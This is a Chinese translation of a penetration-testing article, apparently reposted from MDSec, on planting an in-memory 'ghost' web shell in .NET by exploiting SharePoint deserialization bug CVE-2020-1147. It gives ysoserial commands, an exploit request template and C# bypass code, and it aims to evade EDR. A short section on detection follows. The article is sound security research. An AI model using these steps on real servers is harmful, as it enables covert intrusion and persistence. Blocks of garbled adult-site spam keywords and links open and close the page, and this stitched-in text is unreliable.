国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

在.NET中隱藏帶有只讀Web路徑的Web shell

安全 漏洞
在最近一次滲透測試中,我發現了一個容易受到CVE-2020-1147 影響的SharePoint實例。

在最近一次滲透測試中,我發現了一個容易受到CVE-2020-1147 影響的SharePoint實例。我被要求在不運行任何命令的情況下構建Web Shell,以避免任何可能部署在主機上的EDR解決方案。由于目標SharePoint服務器以最小的特權在IUSR用戶下運行,因此我們不能簡單地通過利用反序列化漏洞(CVE-2020-1147)在Web目錄中創建Web Shell。我記得以前在運行PowerShell命令時,攻擊很容易被發現,所以需要更隱蔽的方法!

這篇文章說明了當我們存在代碼執行漏洞但Web目錄不可寫時如何創建Web Shell,從理論上講,我們應該能夠執行此操作,因為我們的代碼正在Web應用程序中執行,因此我想出了以下兩種解決方案:

使用C#創建功能全面的Web Shell

盡管我很喜歡使用Web Shell,但是大多數功能強大的.NET都是HTML和C#代碼的混合體。因此,清理它們以將其作為純C#代碼運行非常困難且耗時。我的解決方案是使用aspnet_compiler命令,以便從其臨時編譯文件中獲取ASPX Web Shell的C#代碼。

另一個問題是,當我們想與嵌入式Web Shell進行交互時,當易受攻擊的頁面和Web Shell期望完全不同的HTTP請求時,我們可能需要利用我們的易受攻擊的功能,這可能會導致沖突或根本不適用。因此,URL和正文中所有與Web Shell相關的參數以及HTTP動詞,內容類型,Cookie和其他自定義標頭都應以某種方式封裝,以便在利用代碼執行之后在服務器端重新創建。盡管自定義JavaScript代碼可能能夠處理某些封裝任務,但是捕獲HTTP請求的所有必需方面可能并不容易。因此,使用代理處理請求似乎是一種更好,更輕松的方法。例如,可以通過編寫Burp Suite擴展程序來完成此操作,該擴展程序可以捕獲對Web Shell的所有請求,這些請求最初是通過利用代碼執行問題加載的。此擴展可以將Web Shell參數封裝在HTTP請求的標頭中,發送該HTTP請求以利用代碼執行問題。使用標頭可能會受到限制,尤其是當Web Shell請求包含較大的參數(例如正在上傳文件時)時。但是,使用代理替換字符串可以保證可以在服務器端重新創建帶有適當參數(例如HTTP正文、內容類型、HTTP動詞和URL參數)的預期HTTP請求,以使Web Shell正常工作。應該注意的是,使HTTP請求中的只讀參數(例如表單參數)可使用反射寫入是相當容易的。另一件需要注意的重要事情是清除任何可能在運行web shell代碼之前創建的HTTP響應,響應還需要在web shell執行后結束,以防止任何意外數據干擾來自web shell的預期響應。

盡管這種技術看起來可行,但我還是沒有使用它,因為它很復雜,而且每次操作都需要向服務器發送大量web請求,以減少潛在的檢測風險。

通過濫用.NET中的虛擬路徑提供程序來創建虛擬文件(ghost文件)

使用.NET,可以定義虛擬路徑,以便為文件系統以外的其他存儲源提供虛擬文件。此功能非常強大,因為它甚至可以用于替換尚未緩存或編譯的現有文件。這意味著通過替換現有的.NET文件(例如.aspx,.svc,.ashx,.asmx等)來顯示攻擊者的預期內容,即使對于網絡釣魚或其他系統攻擊也可以派上用場。 SharePoint本身使用類似的方法來創建ghost頁面和未托管的頁面!

該解決方案對測試人員而言具有最小的復雜性,因為可以將Web Shell直接嵌入初始漏洞利用代碼中。 YSoSerial.Net項目中的GhostWebShell.cs文件顯示了我們創建的用于在易受攻擊的Web應用程序上運行Web Shell的代碼。

為了使用此代碼,可以對Web Shell文件的內容進行base-64編碼并將其存儲在webshellContentsBase64參數中。 webshellType參數包含Web Shell擴展,而targetVirtualPath參數包含將在服務器上創建的虛擬路徑。除了這些參數外,其他參數可以保持不變,如果需要更多的自定義,代碼中的注釋就足夠了。

以下命令顯示了如何使用它來使用YSoSerial.Net生成LosFormatter有效載荷的示例:

  1. .\ysoserial.exe -g ActivitySurrogateSelectorFromFile -f LosFormatter -c "C:\CoolTools\ysoserial.net\ExploitClass\GhostWebShell.cs;System.dll;System.Web.dll;System.Data.dll;System.Xml.dll;System.Runtime.Extensions.dll" 

應該注意的是,在使用ActivitySurrogateSelectorFromFile gadget 之前,應該使用ActivitySurrogateDisableTypeCheckgadget,以便為新版本的.NET Framework啟用它。

以下步驟顯示如何使用此技術在易受CVE-2020-1147攻擊的SharePoint服務器上創建虛擬Web Shell:

1.準備基本有效載荷,其中包含利用遠程代碼執行漏洞所需的DataSet有效載荷:

  1. POST /_layouts/15/quicklinks.aspx?Mode=Suggestion HTTP/1.1 
  2. uthorization: [ntlm auth header] 
  3. Content-Type: application/x-www-form-urlencoded 
  4. Host: [target] 
  5. Content-Length: [length of body] 
  6. __VIEWSTATE=&__SUGGESTIONSCACHE__=[DataSet payload from YSoSerial.Net] 

2.生成并發送數據集有效載荷以禁用ActivitySurrogateSelector的.NET Framework v4.8 +類型保護:

  1. .\ysoserial.exe -p SharePoint --cve CVE-2020-1147 -g ActivitySurrogateDisableTypeCheck -c "ignored" 

3.生成并發送數據集有效載荷以運行虛擬Web Shell:

  1. .\ysoserial.exe -p SharePoint --cve CVE-2020-1147 -g ActivitySurrogateSelectorFromFile -c "C:\GitHubRepos\myysoserial.net\ExploitClass\GhostWebShell.cs;System.dll;System.Web.dll;System.Data.dll;System.Xml.dll;System.Runtime.Extensions.dll" 

可以更改GhostWebShell.cs文件,使其更具自定義性,以提供多個文件以及隱藏自身,直到看到特殊的標頭或文件名為止。當尚未編譯現有目錄中的特定文件時,更改IsPathVirtual函數也很方便。目前,它會響應所有傳入的請求,但是你可能希望將其限制為某些名稱,或者檢查文件擴展名以提供不同的內容。

繞過Microsoft.AspNet.FriendlyUrls

從.NET 4.5開始,Web應用程序可以使用友好的URL在指向ASPX頁面時不使用URL中的“.aspx”,這可以阻止我們創建ghost web shell的方法。下面的解決方案可以為使用此功能的Web應用程序覆蓋此設置。

  1. foreach(var route in System.Web.Routing.RouteTable.Routes) 
  2.     if (route.GetType().FullName == "Microsoft.AspNet.FriendlyUrls.FriendlyUrlRoute") { 
  3.         var FriendlySetting = route.GetType().GetProperty("Settings", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.Public); 
  4.   
  5.         var settings = new Microsoft.AspNet.FriendlyUrls.FriendlyUrlSettings(); 
  6.         settings.AutoRedirectMode = Microsoft.AspNet.FriendlyUrls.RedirectMode.Off
  7.   
  8.         FriendlySetting.SetValue(route, settings); 
  9.         } 

該代碼已包含在GhostWebShell.cs文件中,需要時,該注釋無需取消注釋(創建有效載荷也需要Microsoft.AspNet.FriendlyUrls.dll文件)。

繞過預編譯的限制

當應用程序處于預編譯模式時,.NET中的虛擬路徑提供程序無法注冊。但是,由于我們已經可以在應用程序上執行代碼,因此可以使用反射更改System.Web.Compilation.BuildManager.IsPrecompiledApp屬性。該代碼已包含在YSoSerial.Net項目的GhostWebShell.cs文件中。

結果,即使應用程序處于預編譯模式,也可以創建虛擬Web Shell。

利用其他Web處理程序

當利用代碼執行漏洞時,虛擬文件方法將起作用,該代碼執行漏洞使用另一個Web處理程序,例如用于Web服務的處理程序。盡管他們的響應可能不會顯示虛擬Web Shell的執行,但是仍然可以通過直接在瀏覽器中瀏覽到虛擬Web Shell來訪問它。

虛擬文件檢測機制

盡管虛擬文件僅存在于內存中,但是它們的編譯版本保存在臨時位置中,該臨時位置用于.NET頁的編譯,默認目錄通常采用以下格式:

  1. C:\Windows\Microsoft.NET\Framework64|Framework\v[version]\Temporary ASP.NET Files\[appname]\[hash]\[hash]\ 

因此,通過檢測新創建的臨時文件,有可能檢測到惡意編譯文件。應該注意的是,在應用程序的默認目錄中接管未編譯的. net文件是可能的。因此,除非應用程序處于預編譯模式,否則檢測新創建的文件名不能用作安全檢測機制,因此,不應創建新的已編譯文件。

如果你不需要在文件系統上創建任何文件,則可以考慮將本文中討論的第一個解決方案(在C#中創建可正常運行的Web Shell)作為替代方案。但是,此解決方案具有通過檢測未加密的流量以獲取特定簽名或檢測到從特定來源向特定目標發出的異常大的Web請求的檢測風險。

本文翻譯自:https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2020-05-13 09:01:23

Web隱藏技術元素

2024-07-01 00:00:06

ASP.NET開源

2009-02-03 10:19:45

2011-05-18 16:02:08

XML

2021-08-28 10:06:29

VueJavascript應用

2011-11-21 18:19:20

Web iMC

2009-07-29 10:30:53

Web應用程序ASP.NET

2010-07-19 10:16:24

ibmdwWeb2.0

2009-06-18 09:42:52

SpringXFire構建Web

2009-07-06 15:19:13

webwork ser

2022-12-12 14:34:43

2013-03-25 10:23:24

路徑掃描web路徑掃描工具掃描

2013-08-20 16:16:19

2011-02-25 13:52:18

Java路徑問題Web路徑問題

2009-07-21 15:55:59

使用Web PartsASP.NET 2.0

2009-07-30 12:42:19

html控件和web控

2009-08-13 09:01:00

ASP.NET開發Web標準

2012-06-20 14:34:03

jQuery

2009-07-29 17:16:47

2009-07-28 15:53:43

ASP.NET Web
點贊
收藏

51CTO技術棧公眾號

国一区二区在线观看| 久久99国产精品久久99| 亚洲一区二区在线| 蜜桃av一区二区| 亚洲第一视频| 亚洲欧美精品suv| 日韩黄色三级在线观看| 国产精品黄视频| 在线一区视频| 男女羞羞视频网站| 欧美日韩国产影片| 国产免费av国片精品草莓男男| 激情五月综合色婷婷一区二区| 一区二区三区在线免费视频| 2020国产精品极品色在线观看| 日韩中文一区| 亚洲高清久久久| 97视频一区| 色悠悠久久综合网| 亚洲天堂久久av| 欧美性感美女一区二区| 韩日午夜在线资源一区二区| 国产精品女同互慰在线看| 中文在线手机av| xvideos亚洲| 偷拍欧美精品| 美女网站免费观看视频| 亚洲精品第一国产综合野| 无人视频在线观看免费| 亚洲日本欧美日韩高观看| 久久综合色占| 伊人影院综合在线| 在线丨暗呦小u女国产精品| 亚洲影视综合| 香蕉视频免费在线| 亚洲综合自拍一区| 99久久免费视频.com| 美脚恋feet久草欧美| 色一情一乱一伦一区二区三区丨| 污视频网站免费在线观看| 久久av.com| 国产色婷婷亚洲99精品小说| 国产精品诱惑| 国产一级片黄色| 久久久影视精品| 亚洲欧美偷拍三级| 国产毛片一区二区三区| 97在线资源| 99re在线| 欧美在线视频日韩| 亚洲影视一区二区三区| 懂色一区二区三区| 国产精品一区二区三区在线播放| 一区二区三区免费看视频| 欧美综合久久| 成人直播在线| 日韩在线综合网| 国产精品亚洲激情| 777亚洲妇女| 成人看片黄a免费看在线| 国产一区一区| 裸体av在线| 97久久人人超碰caoprom欧美| 亚洲欧洲中文日韩久久av乱码| 香蕉综合视频| 2019年精品视频自拍| 97在线电影| 亚洲欧美日韩小说| 亚洲欧美日韩国产综合精品二区| 天堂av网在线| av成人综合网| 欧美精品第一页在线播放| 在线观看亚洲a| 99综合在线| 欧美系列精品| 欧美a在线视频| 99视频国产精品免费观看| 一本色道久久综合亚洲aⅴ蜜桃| 蜜桃视频一区二区三区| 奇米影视888狠狠狠777不卡| 久久久久久69| 日韩麻豆第一页| 中文字幕一区二区三区不卡在线| 国产一区二区在线| 日本24小时在线高清视频| 五月天丁香综合久久国产| 欧美乱人伦中文字幕在线| 91亚洲精品一区二区乱码| 国产精品视频| 久久69成人| 不卡的av影片| 五月婷婷导航| 久久久av水蜜桃| 国产成人av网址| 日韩成人中文电影| 久久久99免费| 97视频热人人精品免费| 黄av在线播放| 日本又骚又刺激的视频在线观看| 国产嫩草在线观看| 欧美激情成人网| 欧美日韩在线视频一区二区三区| 亚洲一卡二卡三卡四卡无卡网站在线看 | 国产视频在线一区二区| 五月天亚洲婷婷| 久久久久久久久97黄色工厂| 亚洲经典三级| 日本一区二区三区电影免费观看| 中文在线аv在线| 午夜视频成人| 高清hd写真福利在线播放| 麻豆精品蜜桃一区二区三区| 明星裸体视频一区二区| 国产精品成人v| 精品欧美一区二区在线观看| 婷婷久久综合九色国产成人 | 欧美经典影片视频网站| 日韩制服一区| 岛国成人毛片| 色多多在线观看| 日本中文字幕中出在线| av网在线观看| 国产精品迅雷| 亚洲一区电影| 人成在线免费网站| 日本黄色一区| 猛男gaygay欧美视频| 欧美亚洲在线日韩| 欧美另类女人| 91久久电影| 美洲天堂一区二卡三卡四卡视频| 国产美女一区二区| 成人黄色av电影| 日韩影院在线观看| 91色九色蝌蚪| 国产精品一区在线| wwww国产精品欧美| 国产精品色哟哟网站| 欧美日韩一区视频| 欧美一区二区三区小说| 欧美精品第1页| 这里精品视频免费| 国产成人激情视频| 亚洲 欧洲 日韩| 久久久国产欧美| 91蜜桃在线视频| 在线免费观看的av| 91九色鹿精品国产综合久久香蕉| 国产资源在线观看入口av| 免费成人网www| 丝袜久久网站| 免费一区视频| 亚洲免费观看高清完整版在线观看| 日韩欧美中文字幕在线播放| 美女久久久久久久| 国产自产女人91一区在线观看| 青草视频在线观看视频| av一本在线| 竹菊久久久久久久| 成人自拍视频在线观看| 亚洲成人久久久| 91丝袜脚交足在线播放| 亚洲精品自拍网| 亚洲不卡系列| 成在在线免费视频| 日韩一区二区三区视频在线| 国产亚洲精品aa午夜观看| 国产综合久久久久久鬼色| 99精品视频免费全部在线| 91精品蜜臀一区二区三区在线| 久久99这里只有精品| 成人免费黄色大片| 亚洲一线二线三线视频| 欧美mv日韩mv| 欧美日韩高清免费| 中午字幕在线观看| 极品在线视频| 国产91在线精品| 日本免费在线视频不卡一不卡二| 风间由美性色一区二区三区| 精品久久久久久亚洲精品| 亚洲国产精品一区二区三区| 国产91网红主播在线观看| 天天爽夜夜爽一区二区三区| 国产精品久久久久久久| 亚洲成人精品影院| 久久在线免费观看视频| 国产在线一区二| 国产三级在线免费观看| 久久精品国产精品青草| 国产精品大尺度| 海角国产乱辈乱精品视频| caoporn超碰国产公开| 欧美裸体在线版观看完整版| 99在线精品观看| 中文字幕最新精品| www.超碰com| 视频小说一区二区| 91理论电影在线观看| 亚洲精品久久久久|